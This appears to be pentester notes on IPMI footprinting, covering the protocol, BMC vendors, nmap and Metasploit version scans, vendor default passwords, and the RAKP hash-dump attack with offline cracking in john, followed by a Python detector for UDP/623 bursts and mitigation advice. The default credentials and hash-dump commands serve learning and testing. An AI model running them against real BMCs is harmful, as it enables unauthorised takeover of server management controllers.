IPMI

footprinting

Intelligent Platform Management Interface (IPMI) is a protocol used by system administrators to manage computers.

It is an out-of-band protocol, so it works even if the system is powered off or unresponsive: it runs on its own controller, independently of the CPU, BIOS, memory, firmware, and operating system.

🐊️ Port: 623 (UDP)

It can be used to monitor components such as temperature, voltage, fans, and power supplies. A system running IPMI version 2.0 can also be managed from a console over a serial connection (serial-over-LAN).

IPMI involves several components (BMC, ICMB, IPMB, etc.). The Baseboard Management Controller (BMC) is the microcontroller that manages the motherboard. The most common BMC implementations are:

  • Supermicro
  • HPE iLO (formerly HP iLO)
  • Dell DRAC
  • Aspeed AST
  • ...

IPMI Pentester Notes ☠️

If we gain access to a BMC, we can monitor, reboot, power off, or reinstall the operating system.

  • We can use nmap or the Metasploit ipmi_version scanner to find the IPMI version:
$ nmap -sU --script ipmi-version -p 623 IP
$ msfconsole -q
msf6> use auxiliary/scanner/ipmi/ipmi_version
msf6> set RHOSTS IP
msf6> run

Default Passwords

  • ADMIN:ADMIN (Supermicro)
  • Administrator:[A-Z0-9]{8} (HPE iLO; a random 8-character string printed on the server's tag)
  • root:calvin (Dell DRAC)

A flaw in the IPMI 2.0 RAKP authentication exchange causes the BMC to return a salted HMAC of the user's password before authentication completes. The hash can then be cracked offline.

$ msfconsole -q
msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6> set RHOSTS IP
msf6> set OUTPUT_JOHN_FILE pjohn
msf6> run
msf6> exit
$ john pjohn -w /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
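From the defender's side, the hash-dump technique above shows up as a burst of short RMCP+ sessions to UDP/623, and any UDP/623 traffic from outside the management subnet is suspicious on its own. The following is an added detection example written for this page, not code from the page or from Metasploit; the flow-log format, the management subnet 10.10.50.0/24 and the burst threshold are assumptions.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Constructed sample flow-log lines (not from the page): one UDP/TCP datagram summary per line.
SAMPLE_FLOWS = """\
2024-05-01T10:00:01Z src=10.10.50.5 dst=10.10.1.20 proto=udp dport=623
2024-05-01T10:00:02Z src=10.10.50.5 dst=10.10.1.20 proto=udp dport=623
2024-05-01T10:00:02Z src=10.10.50.5 dst=10.10.1.20 proto=udp dport=623
2024-05-01T10:00:03Z src=10.10.50.5 dst=10.10.1.20 proto=udp dport=623
2024-05-01T10:00:03Z src=10.10.50.5 dst=10.10.1.20 proto=udp dport=623
2024-05-01T10:00:03Z src=10.10.50.5 dst=10.10.1.20 proto=udp dport=623
2024-05-01T10:00:04Z src=192.168.7.9 dst=10.10.1.21 proto=udp dport=623
2024-05-01T10:00:05Z src=10.10.50.6 dst=10.10.1.20 proto=tcp dport=443
2024-05-01T10:00:06Z src=10.10.50.6 dst=10.10.1.20 proto=udp dport=623
"""

FLOW_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) proto=(?P<proto>\w+) dport=(?P<dport>\d+)")
MGMT_NET = ip_network("10.10.50.0/24")  # assumption: the only subnet allowed to reach BMCs
BURST_THRESHOLD = 5  # assumption: more UDP/623 datagrams than this from one host is suspicious


def parse_flows(text):
    """Extract src/dst/proto/dport from each log line that matches the assumed format."""
    return [m.groupdict() for m in (FLOW_RE.search(l) for l in text.splitlines()) if m]


def find_ipmi_alerts(text, mgmt_net=MGMT_NET, burst=BURST_THRESHOLD):
    """Return (alert_type, src, dst) tuples for IPMI traffic worth reviewing."""
    alerts = []
    per_pair = Counter()
    for f in parse_flows(text):
        if f["proto"] != "udp" or f["dport"] != "623":
            continue  # only RMCP/IPMI traffic on UDP/623 is of interest here
        if ip_address(f["src"]) not in mgmt_net:
            alerts.append(("unexpected_source", f["src"], f["dst"]))
        per_pair[(f["src"], f["dst"])] += 1
    # Many sessions from one host to one BMC in a short log excerpt: hash-dump or brute-force pattern
    for (src, dst), n in per_pair.items():
        if n > burst:
            alerts.append(("session_burst", src, dst))
    return sorted(set(alerts))


if __name__ == "__main__":
    for alert in find_ipmi_alerts(SAMPLE_FLOWS):
        print(alert)
```

Because the hash disclosure is part of the IPMI 2.0 specification itself, it cannot be patched away; keeping UDP/623 reachable only from the management subnet and using long random BMC passwords are the practical mitigations.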